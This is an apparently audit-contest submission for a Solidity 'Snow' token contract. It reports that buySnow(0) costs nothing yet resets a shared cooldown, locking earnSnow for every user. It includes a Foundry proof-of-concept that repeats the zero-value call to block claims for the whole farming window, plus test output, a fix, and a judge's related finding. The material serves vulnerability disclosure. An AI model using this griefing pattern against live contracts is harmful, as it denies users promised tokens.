Snowman Merkle Airdrop

AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: low
Valid

`buySnow(0)` costs nothing and resets the shared earn timer, letting anyone lock `earnSnow` for all users for the whole farming period

Root + Impact

buySnow accepts amount = 0 and still writes s_earnTimer, so an attacker can reset the global earn cooldown for free (only spending gas) and keep earnSnow disabled for every user until farming ends.

Description

  • Buying Snow is meant to cost the buyer s_buyFee * amount, and the free weekly earnSnow is meant to be available to all users.

  • With amount = 0, the payment check msg.value == s_buyFee * amount becomes 0 == 0, so the ETH branch runs and no WETH is pulled. _mint(msg.sender, 0) mints nothing, and then s_earnTimer = block.timestamp executes. The attacker pays no fee, yet resets the global cooldown that earnSnow depends on.

// Snow.sol, lines 79-90
function buySnow(uint256 amount) external payable canFarmSnow {
if (msg.value == (s_buyFee * amount)) { // 0 == 0 when amount is 0 and no ETH is sent
_mint(msg.sender, amount); // mints 0
} else {
i_weth.safeTransferFrom(msg.sender, address(this), (s_buyFee * amount));
_mint(msg.sender, amount);
}
​
s_earnTimer = block.timestamp; // timer reset for free
​
emit SnowBought(msg.sender, amount);
}

The attacker only needs to repeat the call once just before each weekly cooldown would expire.

Risk

Likelihood: Medium

  • It requires an attacker willing to spend gas for no direct profit , but the attack needs no capital, no ETH and no WETH.

Impact: Medium

  • earnSnow is disabled for every user for the entire 12-week farming period, and the attack takes only 12 cheap transactions (see PoC).

Proof of Concept

forge test --match-path test/SnowTimerPoC.t.sol -vv
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
​
import {Test} from "forge-std/Test.sol";
import {Snow} from "../src/Snow.sol";
​
contract SnowTimerPoC is Test {
Snow snow;
address weth = makeAddr("weth");
address collector = makeAddr("collector");
address alice = makeAddr("alice");
address attacker = makeAddr("attacker");
uint256 deployedAt;
​
function setUp() public {
deployedAt = block.timestamp;
snow = new Snow(weth, 5, collector);
}
​
// buySnow(0): no ETH, no WETH, mints nothing, but resets the timer
function test_zeroBuyResetsTimerAndBlocksEarn() public {
vm.prank(attacker);
snow.buySnow(0);
assertEq(snow.balanceOf(attacker), 0);
​
// Alice has never earned, yet she is blocked
vm.prank(alice);
vm.expectRevert(Snow.S__Timer.selector);
snow.earnSnow();
}
​
// The attacker keeps earnSnow locked for the whole farming window
function test_attackerLocksEarnForWholeFarmingWindow() public {
uint256 end = deployedAt + 12 weeks;
uint256 attackerTxs;
​
// Attacker re-arms the timer just before each cooldown would expire
while (block.timestamp + 1 weeks - 1 < end) {
vm.prank(attacker);
snow.buySnow(0);
attackerTxs++;
​
vm.warp(block.timestamp + 1 weeks - 1);
​
// one second before the cooldown would end, Alice is still blocked
vm.prank(alice);
vm.expectRevert(Snow.S__Timer.selector);
snow.earnSnow();
}
​
emit log_named_uint("attacker transactions needed", attackerTxs);
​
// Farming ends and Alice never got a single free Snow
vm.warp(end);
vm.prank(alice);
vm.expectRevert(Snow.S__SnowFarmingOver.selector);
snow.earnSnow();
assertEq(snow.balanceOf(alice), 0);
}
}

Output:

Ran 3 tests for test/SnowTimerPoC.t.sol:SnowTimerPoC
[PASS] test_attackerLocksEarnForWholeFarmingWindow() (gas: 285584)
Logs:
attacker transactions needed: 12
​
[PASS] test_zeroBuyResetsTimerAndBlocksEarn() (gas: 59249)
Suite result: ok. 3 passed; 0 failed; 0 skipped

Both tests pass: a zero-value buy mints nothing and costs nothing, yet blocks earnSnow, and 12 such calls keep every user locked out until farming ends.

Recommended Mitigation

Reject zero-amount purchases, and stop buySnow from writing the earn timer (see the per-user cooldown in the previous finding):

function buySnow(uint256 amount) external payable canFarmSnow {
+ if (amount == 0) revert S__ZeroValue();
if (msg.value == (s_buyFee * amount)) {
_mint(msg.sender, amount);
} else {
i_weth.safeTransferFrom(msg.sender, address(this), (s_buyFee * amount));
_mint(msg.sender, amount);
}
​
- s_earnTimer = block.timestamp;
​
emit SnowBought(msg.sender, amount);
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 1 hour ago
Submission Judgement Published
Validated
Assigned finding tags:

[L-02] Global Timer Reset in Snow::buySnow Denies Free Claims for All Users

## Description: The `Snow::buySnow` function contains a critical flaw where it resets a global timer `(s_earnTimer)` to the current block timestamp on every invocation. This timer controls eligibility for free token claims via `Snow::earnSnow()`, which requires 1 week to pass since the last timer reset. As a result: Any token purchase `(via buySnow)` blocks all free claims for all users for 7 days Malicious actors can permanently suppress free claims with micro-transactions Contradicts protocol documentation promising **"free weekly claims per user"** ## Impact: * **Complete Denial-of-Service:** Free claim mechanism becomes unusable * **Broken Protocol Incentives:** Undermines core user acquisition strategy * **Economic Damage:** Eliminates promised free distribution channel * **Reputation Harm:** Users perceive protocol as dishonest ```solidity function buySnow(uint256 amount) external payable canFarmSnow { if (msg.value == (s_buyFee * amount)) { _mint(msg.sender, amount); } else { i_weth.safeTransferFrom(msg.sender, address(this), (s_buyFee * amount)); _mint(msg.sender, amount); } @> s_earnTimer = block.timestamp; emit SnowBought(msg.sender, amount); } ``` ## Risk **Likelihood**: • Triggered by normal protocol usage (any purchase) • Requires only one transaction every 7 days to maintain blockage • Incentivized attack (low-cost disruption) **Impact**: • Permanent suppression of core protocol feature • Loss of user trust and adoption • Violates documented tokenomics ## Proof of Concept **Attack Scenario:** Permanent Free Claim Suppression * Attacker calls **buySnow(1)** with minimum payment * **s\_earnTimer** sets to current timestamp (T0) * All **earnSnow()** calls revert for **next 7 days** * On day 6, attacker repeats **buySnow(1)** * New timer reset (T1 = T0+6 days) * Free claims blocked until **T1+7 days (total 13 days)** * Repeat step **4 every 6 days → permanent blockage** **Test Case:** ```solidity // Day 0: Deploy contract snow = new Snow(...); // s_earnTimer = 0 // UserA claims successfully snow.earnSnow(); // Success (first claim always allowed) // Day 1: UserB buys 1 token snow.buySnow(1); // Resets global timer to day 1 // Day 2: UserA attempts claim snow.earnSnow(); // Reverts! Requires day 1+7 = day 8 // Day 7: UserC buys 1 token (day 7 < day 1+7) snow.buySnow(1); // Resets timer to day 7 // Day 8: UserA retries snow.earnSnow(); // Still reverts! Now requires day 7+7 = day 14 ``` ## Recommended Mitigation **Step 1:** Remove Global Timer Reset from `buySnow` ```diff function buySnow(uint256 amount) external payable canFarmSnow { // ... existing payment logic ... - s_earnTimer = block.timestamp; emit SnowBought(msg.sender, amount); } ``` **Step 2:** Implement Per-User Timer in `earnSnow` ```solidity // Add new state variable mapping(address => uint256) private s_lastClaimTime; function earnSnow() external canFarmSnow { // Check per-user timer instead of global if (s_lastClaimTime[msg.sender] != 0 && block.timestamp < s_lastClaimTime[msg.sender] + 1 weeks ) { revert S__Timer(); } _mint(msg.sender, 1); s_lastClaimTime[msg.sender] = block.timestamp; // Update user-specific timer emit SnowEarned(msg.sender, 1); // Add missing event } ``` **Step 3:** Initialize First Claim (Constructor) ```solidity constructor(...) { // Initialize with current timestamp to prevent immediate claims s_lastClaimTime[address(0)] = block.timestamp; } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!